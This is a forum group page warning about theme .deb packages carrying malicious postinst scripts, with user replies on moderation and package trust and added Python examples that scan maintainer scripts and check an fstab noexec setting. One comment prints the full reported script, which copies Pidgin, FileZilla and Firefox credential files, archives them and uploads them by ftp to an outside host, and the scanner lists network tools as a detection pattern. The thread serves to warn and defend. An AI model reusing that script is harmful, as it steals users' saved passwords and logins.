Xfce-Look.org - Eyecandy for your Xfce-Desktop
Dangerous .debs


Artwork
Description:

This has happened before:
http://ubuntuforums.org/showthread.php?t=1349678
and it is happening now: some script kiddies are uploading .deb packages with malicious postinst files.

Be careful with .debs. Never install .debs downloaded from OpenDesktop.org without first checking them with Archive Manager.

Right-click on the downloaded .deb and select Open With Archive Manager. Enter the DEBIAN folder (or the control.tar.gz archive) and, if you find a postinst file there, read it with a text editor. Do not install the package if the file contains malicious code. Copy the code, go back to the content page, click on Report inappropriate content and paste the code in.

Members:26
Comments:19
Created:Dec 20 2010
Changed:Dec 23 2010
Readability:readable for everybody
Membership:everybody can join
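
The manual check from the group description can also be done without a GUI. The following is an added example, not code from this group or from OpenDesktop.org: it reads a .deb as the ar archive it is, pulls every maintainer script (postinst and its siblings, all of which run as root at install or removal) out of control.tar.*, and flags patterns of the kind seen in the reported postinst. The heuristic list, the function names and the sample package are assumptions made for the example; a match only tells you which script to read first.

```python
import io, re, tarfile

MAINTAINER_SCRIPTS = {"preinst", "postinst", "prerm", "postrm", "config"}
# Heuristics picked for this example (assumptions, not a complete detector).
SUSPICIOUS = {
    "network client": re.compile(r"\b(ftp|wget|curl|nc|scp)\b"),
    "reads /home": re.compile(r"/home/"),
    "touches /etc": re.compile(r"/etc/"),
}
# Constructed sample script with harmless placeholder paths and host.
SAMPLE_POSTINST = b"#!/bin/sh\ncp /home/*/.config/sample.conf /etc/\nwget -q http://example.invalid/\n"

def ar_members(data):
    """Yield (name, payload) for each member of the ar container a .deb uses."""
    if data[:8] != b"!<arch>\n":
        raise ValueError("not an ar archive")
    pos = 8
    while pos + 60 <= len(data):
        name = data[pos:pos + 16].decode().strip().rstrip("/")
        size = int(data[pos + 48:pos + 58].decode())
        yield name, data[pos + 60:pos + 60 + size]
        pos += 60 + size + size % 2  # members start on even offsets

def maintainer_scripts(deb):
    """Return {name: text} for the maintainer scripts inside control.tar.*."""
    for name, payload in ar_members(deb):
        if name.startswith("control.tar"):
            with tarfile.open(fileobj=io.BytesIO(payload), mode="r:*") as tar:
                return {m.name.lstrip("./"): tar.extractfile(m).read().decode("utf-8", "replace")
                        for m in tar.getmembers()
                        if m.isfile() and m.name.lstrip("./") in MAINTAINER_SCRIPTS}
    raise ValueError("no control.tar.* member found")

def review(deb):
    """Return {script name: sorted labels of the heuristics it matched}."""
    return {name: sorted(label for label, rx in SUSPICIOUS.items() if rx.search(text))
            for name, text in maintainer_scripts(deb).items()}

def build_sample_deb(postinst):
    """Build a minimal constructed .deb in memory so the example runs offline."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        info = tarfile.TarInfo("./postinst")
        info.size = len(postinst)
        tar.addfile(info, io.BytesIO(postinst))
    def member(name, body):
        head = f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(body):<10}`\n"
        return head.encode() + body + b"\n" * (len(body) % 2)
    return b"!<arch>\n" + member("debian-binary", b"2.0\n") + member("control.tar.gz", buf.getvalue())
```

For a downloaded file, pass its bytes to review(), for example review(open(path, "rb").read()). An empty list for a script means only that none of these patterns matched, so the script still needs reading.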




-

 Reported inappropriate content

 
 by ariszlo on: Dec 20 2010
 
Score 79%

http://gnome-look.org/content/show.php?content=136401
http://gnome-look.org/content/show.php?content=136435

The report goes like this:

This member is distributing .deb packages with malicious postinst files. The postinst files of both BlackNWhite.deb and XIGnome.deb contain the following script:

#!/bin/sh
cd /etc/

rm -f accounts.xml sitemanager.xml key3.db signons*

cp /home/*/.purple/accounts.xml /etc/
cp /home/*/.filezilla/sitemanager.xml /etc/
cd /home/*/.mozilla/firefox/*.default/
cp key3.db signons* /etc/
cd /etc/

tar -zcf $$.tar.gz key3.db signons* accounts.xml sitemanager.xml

echo "ftp -n ftp.filehive.megabyet.net << EOT
ascii
user slave@filehive.megabyet.net cookiemonster
put $$.tar.gz
close
bye" >/etc/Gate.sh

chmod 777 Gate.sh
chmod +x Gate.sh

/etc/Gate.sh&
sleep 3
wget -q http://filehive.megabyet.net/index.php&

exit


Ariszló

-

 Re: Reported inappropriate content

 
 by ariszlo on: Dec 20 2010
 
Score 70%

And now the pages are gone.


Ariszló
-

 Re: Reported inappropriate content

 
 by Padster on: Dec 21 2010
 
Score 70%

the black and white one was reuploaded, it seems.
http://gnome-look.org/content/show.php/Black+%27n%27+White+Neon?content=136516
i checked, and it has the same code in it. so i reported it with your message guideline-thing and commented on it warning people. hopefully it gets deleted quickly.


http://techsmartly.net/freePS3.php
http://1227.com
one-oh-one-oh-one-oh

-

 Re: Re: Reported inappropriate content

 
 by ariszlo on: Dec 21 2010
 
Score 70%

Thanks a lot for reporting it.

And also for commenting here. The more comments we have here, the longer this group will be visible to warn unsuspecting visitors.


Ariszló

-

 Re: Re: Re: Reported inappropriate content

 
 by Padster on: Dec 21 2010
 
Score 63%

you're welcome :)


http://techsmartly.net/freePS3.php
http://1227.com
one-oh-one-oh-one-oh


-

 Re: Reported inappropriate content

 
 by Diegstroyer on: Jan 2 2011
 
Score 58%

WOW! The noobs are in danger! We will have the eyes open with .deb files!



-

 thoughts

 
 by nerdykid on: Dec 21 2010
 
Score 70%

there should be some mechanism that either disallows users from uploading stuff before a certain level of community interaction (like posting comments or whatever) or scans the .debs that are uploaded. Maybe both! Reading through a postinst file is nice and all, but what happens if someone uploads some malicious binaries? This whole problem is really a major security issue...



-

 Re: thoughts

 
 by ariszlo on: Dec 21 2010
 
Score 63%

Yes, it is. Perhaps an admin should be asked to join this group.


Ariszló

-

 Re: Re: thoughts

 
 by Frank on: Dec 21 2010
 
Score 75%

Yes. That's a difficult problem to solve.
I deleted accounts from this guy a lot the past few days and deleted the uploads also of course.
An automatic virus detection is difficult because this could also be a binary file which is difficult to detect.

But I have collected all the IP addresses from him and plan to report it to the police in Great Britain in the next few days. This is where he is from.


Frank Karlitschek

-

 Re: Re: Re: thoughts

 
 by Padster on: Dec 21 2010
 
Score 50%

ok, cool :)


http://techsmartly.net/freePS3.php
http://1227.com
one-oh-one-oh-one-oh

-

 Re: Re: Re: thoughts

 
 by Half-Left on: Jan 2 2011
 
Score 50%

Hi Frank.

Perhaps you should put a file filter on the site and make it not include debs? deviantART does this. I suppose they could get around that by just tarring the deb up, but still.

Distributing binaries is not good for security.


A GNOME a day, keeps the doctor away.

-

 Re: Re: Re: Re: thoughts

 
 by Fri13 on: Feb 18 2011
 
Score 50%

But it is still possible to add a link to a third-party file sharing site that includes the deb.

That's why I would rip off the feature to have those files linked to third-party sites.


What is Linux and GNU/Linux?
http://tinyurl.com/532kb8
http://tinyurl.com/mum9x
http://tinyurl.com/ngarn8
http://tinyurl.com/qhuhg
http://tinyurl.com/3uaq48

-

 Re: thoughts

 
 by Fri13 on: Feb 18 2011
 
Score 50%

I believe we should take a hard stand towards script kiddies and protect the "Windows-like" installation.

Linux systems have been secure for decades because we have package systems in use. That means that users use the package manager to download packages from secure package repositories and only from them.

Now the security line is compromised, for two reasons.

1) People are advised to add unofficial package repositories (example: Canonical's PPAs!)

2) People are advised to download and install packages from websites.

What needs to be done is to tell every distributor that they should not support or in any way suggest using third-party repositories (this includes a lot of Canonical's stupid actions).

And then get rid of the possibility to get pre-compiled packages from community sites like these.

People should not even be able to post such things here. Everything that is here should be secure from script kiddies. Of course anyone can find a security flaw in a picture viewer/browser and send a JPEG/PNG image that triggers it. But allowing downloads of anything that can contain scripts is already like looking for trouble.

We can make the software system technically secure, but we cannot make the user account secure against the user's own stupidity. Being less skilled (like most of those who today start using distros like openSUSE, Mandriva or Ubuntu), they are targeted more by social attacks.


What is Linux and GNU/Linux?
http://tinyurl.com/532kb8
http://tinyurl.com/mum9x
http://tinyurl.com/ngarn8
http://tinyurl.com/qhuhg
http://tinyurl.com/3uaq48

-

 another :(

 
 by Padster on: Dec 21 2010
 
Score 63%

wow, this injector guy's busy. just uploaded another icon theme deb with that same postinst file. http://gnome-look.org/content/show.php/CrystalOxygen?content=136523
reported, and warned, as well.


http://techsmartly.net/freePS3.php
http://1227.com
one-oh-one-oh-one-oh

-

 Please Read for Security:

 
 by supatux on: Dec 22 2010
 
Score 70%


Boasting about how he does it:

http://blackknight5.blogspot.com/


How he gets the necessary info:

http://ubuntuforums.org/search.php?searchid=78238180



Be careful out there!



-

 Re: Please Read for Security:

 
 by Padster on: Dec 22 2010
 
Score 50%

wow, why does he even bother writing a blog about it? i mean who cares?


http://techsmartly.net/freePS3.php
http://1227.com
one-oh-one-oh-one-oh

-

 Malicious deb's and scripts

 
 by elmigueluno on: Feb 11 2011
 
Score 63%

The solution will be to not install third-party theme packages via debs. Neither use scripts that ask for the root password, unless you know well what you do, after reading those scripts I mean. But for scripts that change files in the user directory, what can we do?


Saludos
Freddy Vega


-

 Re: Malicious deb's and scripts

 
 by nerdykid on: Feb 11 2011
 
Score 50%

pretty much nothing except read them AFAIK. Even though, I think it could help to implement some sort of trust rating system, similar to ebay's perhaps. That way, the community could vote on members' trustworthiness.



-

 Re: Malicious deb's and scripts

 
 by Karmel on: Feb 18 2011
 
Score 63%

"But for scripts that change files in the user directory, what can we do?"
--------------

You can mount your /home partition with the "noexec" flag.

This will disable all executable scripts/files and programs placed on the /home partition, even if you manually change the file permission to "executable" and try to run any of them manually.

This also disables some trusted programs, if any.


To do this, open (as root) the file:

/etc/fstab


- use Gedit, Mousepad etc., find the entry for the /home partition and add this at the end of the line, preceded by a comma:

noexec

Simply reboot your machine, or remount it manually.

For example - my partition:

/dev/sda3 /home jfs noatime,noexec 0 2


Making a copy of the actual "fstab" file will be a good move.

If some of your trusted programs do not work after that modification (like locally installed programs), just edit the "/etc/fstab" file again - remove
",noexec" and reboot/remount.



You've been warned for possible inconvenience.

8)


Reply to this
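
A way to verify the fstab edit described in the post above, added here as an example and not part of the thread: it checks that the /home entry really carries noexec in its options field, catches a space or stray comma inside that field (which splits the entry into too many fields), and reads the live mount table to confirm the flag is active after the remount. The function names and sample lines are constructed for the example.

```python
# Constructed samples: a correct entry, an entry with a space after the comma,
# and two lines in the format of /proc/self/mounts.
GOOD_FSTAB = "# <device> <dir> <type> <options> <dump> <pass>\n/dev/sda3 /home jfs noatime,noexec 0 2\n"
BAD_FSTAB = "/dev/sda3 /home jfs noatime, noexec 0 2\n"
SAMPLE_MOUNTS = "/dev/sda2 / ext4 rw,relatime 0 0\n/dev/sda3 /home jfs rw,noexec,noatime 0 0\n"

def _entries(text, mountpoint):
    """Yield (line number, fields) for non-comment lines naming mountpoint."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        fields = raw.split()
        if len(fields) >= 4 and not fields[0].startswith("#") and fields[1] == mountpoint:
            yield lineno, fields

def check_fstab(text, mountpoint="/home"):
    """Return (noexec_configured, problems) for mountpoint in fstab text."""
    configured, problems = False, []
    for lineno, fields in _entries(text, mountpoint):
        options = fields[3].split(",")
        if len(fields) > 6 or "" in options:
            problems.append(f"line {lineno}: whitespace or stray comma in options {fields[3]!r}")
        elif not all(f.isdigit() for f in fields[4:]):
            problems.append(f"line {lineno}: dump/pass fields must be numeric")
        else:
            configured = "noexec" in options
    return configured, problems

def is_noexec_active(mounts_text, mountpoint="/home"):
    """Check live state from /proc/self/mounts text; the last matching entry wins."""
    active = None  # None means the mount point is not a separate mount
    for _, fields in _entries(mounts_text, mountpoint):
        active = "noexec" in fields[3].split(",")
    return active

if __name__ == "__main__":
    print(check_fstab(GOOD_FSTAB), check_fstab(BAD_FSTAB))
    with open("/proc/self/mounts") as fh:  # Linux only
        print(is_noexec_active(fh.read()))
```

noexec on /home does not cover a package's maintainer scripts such as postinst: dpkg runs those as root from its own directory under /var/lib/dpkg, outside /home.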
